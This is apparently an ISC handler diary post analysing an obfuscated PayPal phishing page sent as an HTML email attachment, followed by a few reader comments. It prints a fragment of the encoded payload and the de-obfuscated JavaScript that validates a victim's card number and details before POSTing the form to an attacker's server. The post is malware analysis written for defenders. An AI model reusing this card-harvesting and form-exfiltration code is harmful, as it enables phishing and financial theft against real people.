Nicely Obfuscated JavaScript Sample
One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable:
var iKz7xb8 = "160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416 474f5e4b0a49424b58594f5e17085f5e4c0712081416474f5e4b0a444b474f17085c434f5d5a45585e080a49454 45e4f445e17085d434e5e42174e4f5c43494f075d434e5e42060a4344435e434b460759494b464f171b08141646 4344410a42584f4c1708425e5e5a591005054c45445e59044d45454d464f4b5a43590449454705495959154c4b4 743465317784548455e45080a584f461708595e53464f59424f4f5e08140a16595e53464f1400514c45445e074c 4b47434653100a0d784548455e450d060a5 ... ";
The file has a current VT score of 0/55 [1] and is "free" of malicious code, it is just a very nice Paypal phishing page:
The HTTP form data are sent to a rogue server but how to get it? To obtain more details about the malicious JavaScript code, it can be de-obfuscated with JSDetox[2] and some manual changes. The complete code can now be reviewed manually. The following function does the job:
<input type="button" class="ssP" onClick="ss()" value="Submit Form"> ... function ss(){ if (!TLSPort()){ window.location.replace(""); return false; } var GoogleAnalytics="hxxp://" + "86c2e66377265675a8a0edc1befe1837.php"; document.forms["pF"].action=GoogleAnalytics;document.forms["pF"].method="POST"; document.forms["pF"].submit(); }
The TLSPort() function is just a validation function:
function TLSPort(){ var CV=CValid(document.pF.pCC.value); if (!CV) return 0; var x=document.pF.pFN.value,y=document.pF.pEM.value,z=document.pF.pEY.value,\ w=document.pF.pSA.value,v=document.pF.pCV.value; if (!v || !w || !x || y=="00" || z=="00") return 0; return 1; }
CValid is used to verify the CC number provided by the victim:
function CValid(x){ if (/[^0-9-\s]+/.test(x)) return false; var nn=0,nd=0,be=false;x=x.replace(/\D/g, ""); for (var n=x.length - 1; n >=0; n--){ var cd=x.charAt(n),nd=parseInt(cd, 10); if (be){ if ((nd *=2) > 9) nd -=9 } nn +=nd;be=!be } return (nn % 10)==0 }
Here is a valid POST to the attacker's server (using a test Visa number - 4111111111111111 - and fake data):
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
Reverse-Engineering Malware: Malware Analysis Tools and Techniques | Online | Australia Eastern Daylight Time | Mar 31st - Apr 5th 2025 |
Mar 24th 2017
7 years ago
To protect their Intellectual Property, namely code snippets that could be useful on other sites?
To "hide" their sloppy programming?
I once saw some commercially-licensed FORTRAN programs for "contouring" [graphics] where all the characters of the variable-names were either "oh" or "zero" or "eye" or "1".
This reminds me of an episode of "The Match Game with Gene Rayburn" where all the items on the game-board were like '$6.66' or $6.69' or '$9.69'.
Mar 26th 2017
7 years ago
Mar 27th 2017
7 years ago